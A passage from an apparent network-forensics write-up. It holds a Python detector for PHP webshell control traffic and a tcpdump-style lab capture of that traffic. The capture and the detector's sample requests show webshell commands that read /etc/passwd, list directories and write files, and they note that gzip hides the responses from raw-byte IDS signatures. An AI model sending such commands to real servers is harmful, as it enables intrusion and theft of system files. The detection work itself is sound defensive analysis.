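# Form fields seen in the POST bodies of the capture.
WEBSHELL_POST_KEYS = {"p4ssw0rD", "filetosave", "filecontent"}

# (request line, body) pairs as they appear in the capture, plus one benign
# control request.  Constructed list; the packet-header bytes are stripped.
SAMPLE_REQUESTS = [
    ("GET /shells/ajaxphp.php HTTP/1.1", ""),
    ("POST /shells/ajaxphp.php HTTP/1.1", "p4ssw0rD=password"),
    ("GET /shells/ajaxphp.php?runcmd=etcpasswdfile HTTP/1.1", ""),
    ("GET /shells/ajaxphp.php?runcmd=upload HTTP/1.1", ""),
    ("GET /shells/ajaxphp.php?runcmd=listdir%20. HTTP/1.1", ""),
    ("POST /shells/ajaxphp.php?savefile HTTP/1.1",
     "filetosave=/var/www/html/shells/411561.txt&filecontent=wfwerqfrff"),
    ("GET /index.php?page=about HTTP/1.1", ""),
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")
PASSWD_RE = re.compile(rb"^root:[^:]*:0:0:", re.M)


def classify_request(request_line, body=""):
    """Return the reasons a request looks like webshell control traffic.

    Only the request is inspected: the commands travel in the runcmd= query
    parameter or in the POST body, while the results come back inside the
    shell's own HTML page, which is gzip-compressed on the wire.
    """
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return ["unparseable request line"]
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    reasons = []
    for cmd in query.get("runcmd", []):
        verb = cmd.split(" ", 1)[0]          # "listdir ." -> "listdir"
        if verb in WEBSHELL_COMMANDS:
            reasons.append(f"runcmd={verb}")
    bare = WEBSHELL_COMMANDS & set(query)    # "?savefile" carries no value
    if bare:
        reasons.append("bare command in query: " + ",".join(sorted(bare)))
    if m.group("method") == "POST" and body:
        hit = WEBSHELL_POST_KEYS & set(parse_qs(body, keep_blank_values=True))
        if hit:
            reasons.append("POST keys: " + ",".join(sorted(hit)))
    return reasons


def scan_capture(requests=SAMPLE_REQUESTS):
    """Return the request lines in a capture that match the webshell pattern."""
    return [line for line, body in requests if classify_request(line, body)]


def build_webshell_response():
    """Constructed stand-in for the shell's 200 OK body: the requested file is
    written into a form box and the page is gzip-compressed, as the
    Content-Encoding: gzip header in the capture shows."""
    page = (b"<html><body><form><textarea name='output'>\n"
            b"root:x:0:0:root:/root:/bin/bash\n"
            b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
            b"</textarea></form></body></html>")
    return gzip.compress(page)


def passwd_in_response(raw_body, content_encoding=""):
    """Check a response body for /etc/passwd content before and after honouring
    Content-Encoding.  Returns (hit_on_raw_bytes, hit_after_decoding): an IDS
    that matches only raw bytes sees nothing in the compressed page."""
    raw_hit = PASSWD_RE.search(raw_body) is not None
    decoded = gzip.decompress(raw_body) if content_encoding.lower() == "gzip" else raw_body
    return raw_hit, PASSWD_RE.search(decoded) is not None


if __name__ == "__main__":
    for line in scan_capture():
        print("webshell control request:", line)
    print("passwd visible (raw, decoded):",
          passwd_in_response(build_webshell_response(), "gzip"))
```

The second function is the mitigation for the IDS problem the post describes: content signatures only work on the response once the gzip layer is removed, so request-side signatures are the cheaper alert.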

2015-02-11 18:04:35.260009 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [S], seq 3604892541, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2015-02-11 18:04:35.260065 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [S.], seq 3883739444, ack 3604892542, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2015-02-11 18:04:35.264540 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [.], ack 1, win 64, length 0
2015-02-11 18:04:35.264579 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [P.], seq 1:453, ack 1, win 64, length 452
GET /shells/ajaxphp.php HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:04:35.264614 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [.], ack 453, win 237, length 0
2015-02-11 18:04:35.267945 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [P.], seq 1:754, ack 453, win 237, length 753
HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:04:35 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 342
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

2015-02-11 18:04:35.323244 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [.], ack 754, win 61, length 0
2015-02-11 18:04:40.273129 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [F.], seq 754, ack 453, win 237, length 0
2015-02-11 18:04:40.337269 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [.], ack 755, win 61, length 0
2015-02-11 18:04:42.694786 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [F.], seq 453, ack 755, win 61, length 0
2015-02-11 18:04:42.694838 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [.], ack 454, win 237, length 0
2015-02-11 18:04:42.694850 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [S], seq 241198115, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2015-02-11 18:04:42.694871 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [S.], seq 4062599801, ack 241198116, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2015-02-11 18:04:42.701551 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [.], ack 1, win 64, length 0
2015-02-11 18:04:42.701754 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [P.], seq 1:640, ack 1, win 64, length 639
POST /shells/ajaxphp.php HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Content-Length: 17
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.100
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

p4ssw0rD=password
2015-02-11 18:04:42.701791 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [.], ack 640, win 239, length 0
2015-02-11 18:04:42.703527 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [.], seq 1:2921, ack 640, win 239, length 2920
HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:04:42 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3018
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

2015-02-11 18:04:42.703679 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [P.], seq 2921:3431, ack 640, win 239, length 510
2015-02-11 18:04:42.711577 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [.], ack 3431, win 64, length 0
2015-02-11 18:04:47.705264 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [F.], seq 3431, ack 640, win 239, length 0
2015-02-11 18:04:47.811352 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [.], ack 3432, win 64, length 0
2015-02-11 18:04:55.286569 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [F.], seq 640, ack 3432, win 64, length 0
2015-02-11 18:04:55.286617 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [.], ack 641, win 239, length 0
2015-02-11 18:05:11.060023 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [S], seq 1595314139, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2015-02-11 18:05:11.060073 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [S.], seq 335131994, ack 1595314140, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2015-02-11 18:05:11.065860 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [.], ack 1, win 64, length 0
2015-02-11 18:05:11.066160 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [P.], seq 1:453, ack 1, win 64, length 452
GET /shells/ajaxphp.php?runcmd=etcpasswdfile HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:11.066209 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [.], ack 453, win 237, length 0

2015-02-11 18:05:11.067293 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [P.], seq 1:625, ack 453, win 237, length 624
HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:11 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 213
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

2015-02-11 18:05:11.143502 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [.], ack 625, win 62, length 0
2015-02-11 18:05:16.068811 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [F.], seq 625, ack 453, win 237, length 0
2015-02-11 18:05:16.180013 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [.], ack 626, win 62, length 0
2015-02-11 18:05:16.486016 IP 192.168.1.104.138 > 192.168.1.255.138: NBT UDP PACKET(138)
2015-02-11 18:05:23.537614 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [F.], seq 453, ack 626, win 62, length 0
2015-02-11 18:05:23.537661 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [.], ack 454, win 237, length 0
2015-02-11 18:05:23.537670 IP 192.168.1.104.62059 > 192.168.1.100.80: Flags [S], seq 897662518, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2015-02-11 18:05:23.537691 IP 192.168.1.100.80 > 192.168.1.104.62059: Flags [S.], seq 456804555, ack 897662519, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2015-02-11 18:05:23.552774 IP 192.168.1.104.62059 > 192.168.1.100.80: Flags [.], ack 1, win 64, length 0
2015-02-11 18:05:23.552812 IP 192.168.1.104.62059 > 192.168.1.100.80: Flags [P.], seq 1:446, ack 1, win 64, length 445
GET /shells/ajaxphp.php?runcmd=upload HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:23.552847 IP 192.168.1.100.80 > 192.168.1.104.62059: Flags [.], ack 446, win 237, length 0
2015-02-11 18:05:23.554143 IP 192.168.1.100.80 > 192.168.1.104.62059: Flags [P.], seq 1:707, ack 446, win 237, length 706
HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:23 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 295
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


2015-02-11 18:05:34.416483 IP 192.168.1.104.62060 > 192.168.1.100.80: Flags [P.], seq 1:451, ack 1, win 64, length 450
GET /shells/ajaxphp.php?runcmd=listdir%20. HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:34.416518 IP 192.168.1.100.80 > 192.168.1.104.62060: Flags [.], ack 451, win 237, length 0
2015-02-11 18:05:34.422198 IP 192.168.1.100.80 > 192.168.1.104.62060: Flags [.], seq 1:2921, ack 451, win 237, length 2920
HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:34 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

2015-02-11 18:05:34.422356 IP 192.168.1.100.80 > 192.168.1.104.62060: Flags [P.], seq 2921:4141, ack 451, win 237, length 1220
2015-02-11 18:05:34.435890 IP 192.168.1.104.62060 > 192.168.1.100.80: Flags [.], ack 2921, win 64, length 0
2015-02-11 18:05:34.488045 IP 192.168.1.104.62060 > 192.168.1.100.80: Flags [.], ack 4141, win 60, length 0
2015-02-11 18:05:39.427403 IP 192.168.1.100.80 > 192.168.1.104.62060: Flags [F.], seq 4141, ack 451, win 237, length 0

2015-02-11 18:05:42.752612 IP 192.168.1.104.62061 > 192.168.1.100.80: Flags [P.], seq 1:600, ack 1, win 64, length 599
POST /shells/ajaxphp.php?savefile HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Content-Length: 65
Origin: http://192.168.1.100
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

filetosave=/var/www/html/shells/411561.txt&filecontent=wfwerqfrff
2015-02-11 18:05:42.752647 IP 192.168.1.100.80 > 192.168.1.104.62061: Flags [.], ack 600, win 238, length 0
2015-02-11 18:05:42.753420 IP 192.168.1.100.80 > 192.168.1.104.62061: Flags [P.], seq 1:393, ack 600, win 238, length 392
HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:42 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

Nope, can’t chmod nor save :(

2015-02-11 18:05:47.994518 IP 192.168.1.104.62062 > 192.168.1.100.80: Flags [P.], seq 1:453, ack 1, win 64, length 452
GET /shells/ajaxphp.php?runcmd=etcpasswdfile HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:47.994545 IP 192.168.1.100.80 > 192.168.1.104.62062: Flags [.], ack 453, win 237, length 0
2015-02-11 18:05:47.995447 IP 192.168.1.100.80 > 192.168.1.104.62062: Flags [P.], seq 1:625, ack 453, win 237, length 624
HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:47 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 213
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

2015-02-11 18:05:48.054636 IP 192.168.1.104.62062 > 192.168.1.100.80: Flags [.], ack 625, win 62, length 0
2015-02-11 18:05:50.111106 IP 192.168.1.104.62062 > 192.168.1.100.80: Flags [P.], seq 453:905, ack 625, win 62, length 452
GET /shells/ajaxphp.php?runcmd=etcpasswdfile HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:50.111936 IP 192.168.1.100.80 > 192.168.1.104.62062: Flags [P.], seq 625:1248, ack 905, win 245, length 623
HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:50 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 213
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
